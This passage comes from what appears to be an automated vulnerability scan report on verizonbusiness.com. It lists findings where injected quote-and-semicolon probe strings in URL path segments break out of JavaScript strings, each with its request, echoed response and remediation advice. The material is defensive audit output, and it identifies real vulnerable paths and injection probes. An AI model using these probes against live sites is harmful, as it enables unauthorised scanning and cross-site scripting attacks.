The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd3fa"%3bdb463a634f5 was submitted in the REST URL parameter 2. This input was echoed as bd3fa";db463a634f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsbd3fa"%3bdb463a634f5/media/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:43 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47093
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsbd3fa";db463a634f5/media/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMI
...[SNIP]...

1.366. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eaef4'%3b9542cc15bbc was submitted in the REST URL parameter 2. This input was echoed as eaef4';9542cc15bbc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newseaef4'%3b9542cc15bbc/media/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47095
Date: Wed, 17 Nov 2010 00:52:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/newseaef4';9542cc15bbc/media/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.367. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad1ce'%3bc6528be2ef2 was submitted in the REST URL parameter 3. This input was echoed as ad1ce';c6528be2ef2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/mediaad1ce'%3bc6528be2ef2/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:32 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 49743
Date: Wed, 17 Nov 2010 00:53:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news/mediaad1ce';c6528be2ef2/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.368. http://www.verizonbusiness.com/about/news/media/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/media/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54e6"%3b18d06262f83 was submitted in the REST URL parameter 3. This input was echoed as b54e6";18d06262f83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/mediab54e6"%3b18d06262f83/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:13 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49741
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/mediab54e6";18d06262f83/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.369. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba897"%3b7a99e9a7558 was submitted in the REST URL parameter 1. This input was echoed as ba897";7a99e9a7558 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aboutba897"%3b7a99e9a7558/news/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:51:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Date: Wed, 17 Nov 2010 00:51:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:51:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/aboutba897";7a99e9a7558/news/network/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.370. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3044c'%3b54098f19c14 was submitted in the REST URL parameter 1. This input was echoed as 3044c';54098f19c14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about3044c'%3b54098f19c14/news/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about3044c';54098f19c14/news/network/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.371. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a5b5'%3bf9d0caef585 was submitted in the REST URL parameter 2. This input was echoed as 5a5b5';f9d0caef585 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news5a5b5'%3bf9d0caef585/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:56 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47097
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:56 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news5a5b5';f9d0caef585/network/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.372. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db39f"%3b127dbd848b5 was submitted in the REST URL parameter 2. This input was echoed as db39f";127dbd848b5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/newsdb39f"%3b127dbd848b5/network/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:52:42 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=UTF-8
Content-Length: 47097
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:52:42 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:52:42 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/newsdb39f";127dbd848b5/network/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.373. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50d3c'%3b1ccaec917f9 was submitted in the REST URL parameter 3. This input was echoed as 50d3c';1ccaec917f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/network50d3c'%3b1ccaec917f9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:20 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49745
Date: Wed, 17 Nov 2010 00:53:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/about/news/network50d3c';1ccaec917f9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.374. http://www.verizonbusiness.com/about/news/network/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/network/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4371"%3bae2e9acfa1 was submitted in the REST URL parameter 3. This input was echoed as e4371";ae2e9acfa1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news/networke4371"%3bae2e9acfa1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:04 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 49745
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about/news/networke4371";ae2e9acfa1/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.375. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2341f"%3b5eb4bfdfa12 was submitted in the REST URL parameter 1. This input was echoed as 2341f";5eb4bfdfa12 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about2341f"%3b5eb4bfdfa12/news/podcasts/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/about2341f";5eb4bfdfa12/news/podcasts/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.376. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69114'%3b5d23fde5181 was submitted in the REST URL parameter 1. This input was echoed as 69114';5d23fde5181 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about69114'%3b5d23fde5181/news/podcasts/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:23 GMT
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about69114';5d23fde5181/news/podcasts/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.377. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c853'%3bca22c29151d was submitted in the REST URL parameter 2. This input was echoed as 6c853';ca22c29151d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/news6c853'%3bca22c29151d/podcasts/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 47099
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/about/news6c853';ca22c29151d/podcasts/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.378. http://www.verizonbusiness.com/about/news/podcasts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /about/news/podcasts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82892"%3b3b168ef6b79 was submitted in the REST URL parameter 2. This input was echoed as 82892";3b168ef6b79 in the application's response.

